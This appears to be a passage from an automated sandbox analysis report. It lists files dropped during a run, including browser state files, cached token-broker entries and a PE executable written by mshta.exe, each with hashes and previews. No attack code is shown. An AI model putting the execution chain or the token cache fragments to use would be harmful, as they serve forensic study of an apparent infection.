                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4df31.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                  MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                  SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                  SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                  SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ae8eff5d-2e87-4b03-8c21-c2998dfb9512.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):46221
                                                                                                                                                                                                                  Entropy (8bit):6.087407659678087
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:LMkbJrT8IeQc5LKWJfi1zNtecSxiYCOgQLXxYPCionJDSgzMMd6qD47u30d:LMk1rT8HDK50XxWFontSmd6qE7/
                                                                                                                                                                                                                  MD5:6D363FA3E20B97CD07E14E2C30DBDAF0
                                                                                                                                                                                                                  SHA1:BED1F47FF7EDC5DC0949B2D77C8784AC82D2FF71
                                                                                                                                                                                                                  SHA-256:4BF562F38D66773BA187C72638CF4014EBC8E519B9BD3B39717DAA6EFCF1500F
                                                                                                                                                                                                                  SHA-512:E2E1F49856B26043C1855AD37AA8BC769E89D695E6C4339E88B847EEB21ED8C5770C583F716B7EB35D6E18FFB3E11538DD751D484943528B0B50DFE217CF544D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\af5d8bb8-b067-4cb3-a1b3-32db4a4b7986.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):46144
                                                                                                                                                                                                                  Entropy (8bit):6.087496528627283
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:7MkbJrT8IeQc5dKWJfi1zNtec/9xiYCOgQLXxYPCionJDSgzMMd6qD47u30d:7Mk1rT8H1K5/fXxWFontSmd6qE7/
                                                                                                                                                                                                                  MD5:B8860A7323053113633AFBCCD080CDDB
                                                                                                                                                                                                                  SHA1:E41C368C7554326AF78EF642833F7A57F447CFF2
                                                                                                                                                                                                                  SHA-256:9F1C3A85BED0838A7348D3B1DED5A4085D2DCE65E52EF366E1878C38F0E4CCCD
                                                                                                                                                                                                                  SHA-512:739CE6BBE021A008DF01086EAE7329B3B207FB659005C603F74B242F6C0F6B315458E78065B06B3378F429CB933EA2B3E2E748D599EBCFE659D74C00326D4F28
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ec844b9d-c488-4185-ad21-94e400d0b20a.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44902
                                                                                                                                                                                                                  Entropy (8bit):6.095693446140294
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWDki1zNtec/NEiBPbsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn6/EKtSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:D9A783347854BBBC83FB17CCD0CE058F
                                                                                                                                                                                                                  SHA1:2B5962FA6D58442F331DCACFC974AAB9DDEDBE83
                                                                                                                                                                                                                  SHA-256:E422EC76BD2AE2869D9C56D807102B87AFA8D9E205DDCB92DBCFD673EE204009
                                                                                                                                                                                                                  SHA-512:CC845D0A8B54F4566C4578CF35EE060062DBCCFEA11C06BEA8B83F9D866D5305315A7F445A93CA49411052576EF1F8D4F1D7CA3657C893F99B9A2C273343267E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fdf96fad-2c66-4709-8fd2-be6d2918a1f4.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):46221
                                                                                                                                                                                                                  Entropy (8bit):6.087409495185179
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:LMkbJrT8IeQc5L9WJfi1zNtecSxiYCOgQLXxYPCionJDSgzMMd6qD47u30d:LMk1rT8HD950XxWFontSmd6qE7/
                                                                                                                                                                                                                  MD5:5C6031A7DA7D1F6F7F8E6A1DF889BF27
                                                                                                                                                                                                                  SHA1:8C7509EC5461AFB3ADAB4696C9A742C389ACDC5E
                                                                                                                                                                                                                  SHA-256:507A1386C884C613B052F77D7039D51BDD2E5764B3239342993108A938C2E07C
                                                                                                                                                                                                                  SHA-512:C85CB10112CEAE78D31DEEDCBAC45A7664ADB5F5F024180CFE43DCD8696F2BAF8E72390E81A926EBF6588F53FA411FCEEB1AC89FCC305297708AF8A306100C35
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                  Entropy (8bit):3.8435318066029853
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxvxl9Il8utwCnGE29cHPJX0L9suPN0pd1rc:mGYUCnGE29yPMyi0K
                                                                                                                                                                                                                  MD5:1AB56809AD74D0B130D2118011E6D5FD
                                                                                                                                                                                                                  SHA1:967CAB8E2A865728D9AE8DF581B5696E0E2FB5BC
                                                                                                                                                                                                                  SHA-256:F4EDFAE6CFD19E17F6BC03391630A46BE7A993C77135FDA57C033C82FBFCA1E7
                                                                                                                                                                                                                  SHA-512:8EB74C7C6F26543B5A7A8A243249C8F543DFC9B6EB4B9E8B4F75F6CF1E6831CC9FB378437202650F8970BF11E75A0989B35FCBA39333E60764BDB8D2819E33FD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.J.B.h.q.5.B.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.s.A.c.C.G.v.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                  Entropy (8bit):3.99940769846296
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:5YDimatepQlrb/ilqwhFX1ytI4obCAMkBzFg8cJk9V:5g07lGqyVQK4ouAMcRqy
                                                                                                                                                                                                                  MD5:BB5B295380013A8C84DDE0BB53421143
                                                                                                                                                                                                                  SHA1:073C40004E5951420F09DF5D6687A74BDF20A11D
                                                                                                                                                                                                                  SHA-256:3E1DC0C741348860E4F2656F2DF0F319DBB9EACD751086CFB61930C3C3A40757
                                                                                                                                                                                                                  SHA-512:A59C24F2C4EA5C8D09341FDA1149F6C4231C5B1BA0E993D50A7BAD5630B3F886597495D6E9707C2742FFF7DD0B0756235AE040925BD6012A9CF5A20E46285436
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".c.H.i.i.k.I.h.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.s.A.c.C.G.v.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                  Entropy (8bit):3.8847498701323295
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xmxl9Il8urlAMNnkKPV3AckTLzL2OslWGmEd/vc:aMY3AMa+A7LfcgGQ
                                                                                                                                                                                                                  MD5:CE1B7DA2E0CCB00E6116A5C90F073C92
                                                                                                                                                                                                                  SHA1:3CB1940B2BD3487356A42EFC31B38162F46FCCC7
                                                                                                                                                                                                                  SHA-256:6775FCC9CABB71DD5851B4BA3862963E64FF82721291A7575861FACC0710CA85
                                                                                                                                                                                                                  SHA-512:D6EC3359D5B757AE5B98FD14925F60F70F4F80F68DE48BEE6447B203D87DF4DCA0C1124AC4274718340456267F901B1E7680C286B80F8727E0B47DE83DCB92D5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.z.c.B.w.V.l.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.s.A.c.C.G.v.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):78474
                                                                                                                                                                                                                  Entropy (8bit):5.040626159678465
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:fsnZcnsXsnZcns0a6hy5snZcnsZCsnZcns:EZcbZcI6hyaZcCZc
                                                                                                                                                                                                                  MD5:E61B84E79E13C82061BAFDDD6605A67C
                                                                                                                                                                                                                  SHA1:65838D7900016408A9BEA470C6B483662CED2B7D
                                                                                                                                                                                                                  SHA-256:E414E964D0DCA9F1C045B9C6561B8085681761E8039056266E31E74A39B4DB4D
                                                                                                                                                                                                                  SHA-512:6A9CBF4205A5DCE13B6B7E99918C3F38542F8D68E196144F109918FAC238188A5F6C50D8AA36C65B62CAA48EB7FD9ED6219E3CB7D572232B0723CF6C73D09EF2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
